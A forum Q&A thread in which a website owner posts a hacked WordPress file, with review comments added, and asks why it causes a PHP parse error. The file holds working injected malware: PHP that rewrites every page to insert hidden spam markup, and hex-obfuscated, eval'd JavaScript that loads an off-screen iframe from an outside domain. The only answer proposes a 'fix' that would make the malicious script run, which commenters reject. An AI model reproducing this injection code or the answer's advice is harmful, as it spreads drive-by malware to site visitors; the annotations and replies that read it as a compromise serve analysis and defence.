
Our website elliotts agency (www.elliottsagency.com) has this error message:

Parse error: syntax error, unexpected T_VAR in /home/ellcom1/public_html/wp-includes/js/customize-panel.js on line 45

The code for this file is posted below. The file may have been hacked. Can anyone tell me how to fix it or what is wrong with it?

<?php

// Calls load_extra_modules() once, at include time, and stores the markup it returns in the constant GSDGF.
define('GSDGF',load_extra_modules());
// Registers ob_gzzs() as the output-buffer callback, so the buffered page output is passed to it
// (and can be rewritten by it) before it is sent to the client.
// NOTE(review): the callback name resembles PHP's built-in ob_gzhandler; presumably chosen to look
// routine in a quick read — confirm. Unexpected ob_start() callbacks are worth searching for site-wide.
ob_start('ob_gzzs');

/**
 * Output-buffer callback: splices the markup held in the GSDGF constant into the buffered page.
 *
 * The insertion point is derived from crc32() of $_SERVER['REQUEST_URI'], so for a given URI the
 * same branch and the same tag index are chosen on every request, while other URIs may get a
 * different position.
 * NOTE(review): a callback that rewrites every HTML response to add extra markup is a common sign
 * of injected code; compare this file against a known-good copy rather than editing it in place.
 *
 * @param string $data Buffered output handed over by ob_start().
 * @return string The output, with the GSDGF markup inserted when an insertion point was found.
 */
function ob_gzzs($data)
{
// Markup to inject; '@' silences the diagnostic PHP would raise if GSDGF were not defined.
$_9 = @GSDGF;

// Per-URI number used to pick the insertion strategy (0, 1 or 2).
$crc32=abs(crc32($_SERVER['REQUEST_URI']));
$rnd = $crc32 % 3;

if ($rnd === 0)
{
    // Insert immediately after the first opening <body ...> tag (limit 1, case-insensitive).
    $data = preg_replace('!(<body[^<>]*>)!is','\\1'  . $_9,$data,1);
}
elseif($rnd === 1)
{
    // Insert immediately before the first closing </body> tag.
    $data = preg_replace('!(</body[^<>]*>)!is', $_9 . '\\1',$data,1);
}
else
{
    // Collect every closing tag together with its byte offset in the output.
    preg_match_all('!</.*?>!',$data,$tmp,PREG_OFFSET_CAPTURE);
    $total_tags = count($tmp[0]);

    if ($total_tags>0)
    {
        // Pick one closing tag by the per-URI number and insert right after the end of that tag.
        $rnd = $crc32 % $total_tags;
        $rnd_offset = $tmp[0][$rnd][1];
        $rnd_offset += strlen($tmp[0][$rnd][0]);
        $data = substr($data,0,$rnd_offset) . $_9 . substr($data,$rnd_offset);
    }
}

// Output with no matching tag passes through unchanged.
return $data;
}


/**
 * Expands "{a|b|c}" groups in $t: each group is replaced by one of its '|'-separated alternatives.
 *
 * The alternative is selected with abs(crc32($_SERVER['REQUEST_URI'])) modulo the number of
 * alternatives, so the same URI always produces the same text. str_replace() swaps every
 * occurrence of a matched group, not only the first.
 * NOTE(review): in this file it is applied to the list items built by load_extra_modules(), i.e.
 * it varies the injected text from page to page.
 *
 * @param string $t Template text.
 * @return string $t with each matched group replaced; unchanged when no group is found.
 */
function _z($t){if(preg_match_all('!{([^}]+)}!',$t,$o,PREG_SET_ORDER))   
{$r=abs(crc32($_SERVER['REQUEST_URI']));foreach($o as $x)
{$m=explode('|',$x[1]);$t=str_replace($x[0],$m[$r%count($m)],$t);}}return 
$t;}
/**
 * Builds the markup stored in GSDGF: a <div class='raindance'> wrapping a <ul>, followed by an
 * inline <script> that sets that div's style.display to 'none'.
 *
 * - The div id is $zd = $za*$zb+$zc, computed from mt_rand() values on each call. The script is
 *   given the same value as the unevaluated expression "$za*$zb+$zc", so the id never appears
 *   literally in the script text.
 * - The property name and value are assembled from fragments ('dis'+'play', 'n'+'on'+'e');
 *   presumably to defeat simple string matching for "display" / "none" — confirm.
 * - NOTE(review): $a is never assigned in this function as posted, so the foreach body does not
 *   run (PHP raises a warning) and the list is empty in this copy.
 *
 * Markup that is delivered in the HTML but hidden from visitors by script is a common sign of
 * injected hidden content; treat the div class and this function name as search strings when
 * checking other files for the same injection.
 *
 * @return string The hidden-list markup plus the hiding script.
 */
function load_extra_modules(){
$za=mt_rand(111,999);$zb=mt_rand(111,999);$zc=mt_rand(11,99);$zd=$za*$zb+$zc;$ze="{$za}*{$zb}+{$zc}";$s="<div class='raindance' id='$zd'><ul>";
foreach($a as $x)$s.=_z("<li>$x</li>");return "$s</ul></div>\n<script type='text/javascript'>\n(function(z,b,c,g){g.getElementById(z).style[b]='n'+c;})($ze,'dis'+'play','on'+'e',document);\n</script>";}


// NOTE(review): injected client-side script appended after the PHP functions; the identical
// 32-hex-character comments at both ends delimit the injected block.
// Why the site shows a parse error: this file is being parsed as PHP, and PHP keywords are
// case-insensitive, so the upper-case `VAR` is read as PHP's `var` keyword (token T_VAR) in a place
// where it is not allowed. `VAR` is not valid JavaScript either (JS keywords are case-sensitive),
// so this copy would not run in a browser as written.
// What it is built to do: the loop converts each hex pair of `ktyknkds` to a character code and the
// result goes through a nested eval(), so the real script is hidden in the hex string. Decoded
// statically (not executed), the string is a window.onload handler that sets a marker cookie with
// a one-day expiry and, when the cookie was not already set, appends a <div> positioned off-screen
// (top:-1000px; left:-9999px) containing an <iframe> that loads a URL on js.belayamorda[.]info.
// Handling: this is an indicator of compromise, not a bug to repair. Correcting the keyword would
// only make the injected script work; restore the file from a known-good copy instead.
/*a392ac429c1ff5e72a4ba4585c4cc917*/;(function(){VAR keffaete="";VAR ktyknkds="77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e7365744461746528642e6765744461746528292b63293b7d6966286120262620622920646f63756d656e742e636f6f6b6965203d20612b273d272b622b2863203f20273b20657870697265733d272b642e746f555443537472696e672829203a202727293b656c73652072657475726e2066616c73653b7d66756e6374696f6e2078333362712861297b7661722062203d206e65772052656745787028612b273d285b5e3b5d297b312c7d27293b7661722063203d20622e6578656328646f63756d656e742e636f6f6b6965293b69662863292063203d20635b305d2e73706c697428273d27293b656c73652072657475726e2066616c73653b72657475726e20635b315d203f20635b315d203a2066616c73653b7d766172207833336471203d2078333362712822633237663239633661313638333230643638373036363661316531633739616322293b69662820783333647120213d2022616233323038366461653237616530333732343765643865616136623363386122297b783232627128226332376632396336613136383332306436383730363636613165316337396163222c226162333230383664616532376165303337323437656438656161366233633861222c31293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2f2f6a732e62656c6179616d6f7264612e696e666f2f6d656761616476657274697a652f3f415a5a746e466e616d463d576f676e587278266b6579776f72643d6565353036646465353461666161353465393135643939353335313063336536264453717a446363517863446f52786971536d3d78425257734a4a5579457a465526547762624757685a4f3d68706869487a6f7a7670565650425a266f4b767a6a70774262717a7a77477165523d50534f4346776d59495177266f65735871455347704f3d52514a7249466b626550566a794a26704374627a464c4650463d75616d6864554376552666446d4f6b6b3d434c6b686256576f6d4d64744742266359694f70797572594d3d4d7663774855664e6126667656564a75744f714b5857546d727a6a743d707053594a4b544326764b6249796445715559624a4e7063786b463d5657744c4f4b52596f626d63223b78323264712e696e6e657248544d4c3d223c646976207374796c653
d27706f736974696f6e3a6162736f6c7574653b7a2d696e6465783a313030303b746f703a2d3130303070783b6c6566743a2d3939393970783b273e3c696672616d65207372633d27222b78323271712b22273e3c2f696672616d653e3c2f6469763e223b646f63756d656e742e626f64792e617070656e644368696c64287832326471293b7d7d";for (VAR kdzefiiz=0;kdzefiiz<ktyknkds.length;kdzefiiz+=2){keffaete=keffaete+parseInt(ktyknkds.substring(kdzefiiz,kdzefiiz+2), 16)+",";}keffaete=keffaete.substring(0,keffaete.length-1);eval(eval('String.fromCharCode("+keffaete+")'));})();/*a392ac429c1ff5e72a4ba4585c4cc917*/

1 Answer


I think the issue is with VAR, so use this code

/a392ac429c1ff5e72a4ba4585c4cc917/;(function(){$keffaete="";$ktyknkds="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 2f6a732e62656c6179616d6f7264612e696e666f2f6d656761616476657274697a652f3f415a5a746e466e616d463d576f676e587278266b6579776f72643d6565353036646465353461666161353465393135643939353335313063336536264453717a446363517863446f52786971536d3d78425257734a4a5579457a465526547762624757685a4f3d68706869487a6f7a7670565650425a266f4b767a6a70774262717a7a77477165523d50534f4346776d59495177266f65735871455347704f3d52514a7249466b626550566a794a26704374627a464c4650463d75616d6864554376552666446d4f6b6b3d434c6b686256576f6d4d64744742266359694f70797572594d3d4d7663774855664e6126667656564a75744f714b5857546d727a6a743d707053594a4b544326764b6249796445715559624a4e7063786b463d5657744c4f4b52596f626d63223b78323264712e696e6e657248544d4c3d223c646976207374796c653d27706f736974696f6e3a6162736f6c7574653b7a2d696e6465783a313030303b746f703a2d3130303070783b6c6566743a2d3939393970783b273e3c696672616d65207372633d27222b78323271712b22273e3c2f696672616d653e3c2f6469763e223b646f63756d656e742e626f64792e617070656e644368696c64287832326471293b7d7d";for ($kdzefiiz=0;kdzefiiza392ac429c1ff5e72a4ba4585c4cc917/

instead of this code

/a392ac429c1ff5e72a4ba4585c4cc917/;(function(){VAR keffaete="";VAR ktyknkds="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";for (VAR kdzefiiz=0;kdzefiiza392ac429c1ff5e72a4ba4585c4cc917/

  • Thank you I tried this but unfortunately it didn't work. If you have any other recommendations, please let me know. – elliotts1 Feb 15 '16 at 12:41
  • Replacing hacked code which generates a syntax error with hacked code which does what the hacker wants strikes me as a Really Bad Idea. The incompetent hacker might have a different perception. At a minimum, run that hexstring through a hex converter to see what it does, before executing it. – rici Feb 15 '16 at 14:36
  • Thanks Rici. Do you have any ideas how to fix this? – elliotts1 Feb 15 '16 at 14:38
  • @elliotts1: I'd be looking for a backup if I were you. – rici Feb 15 '16 at 14:39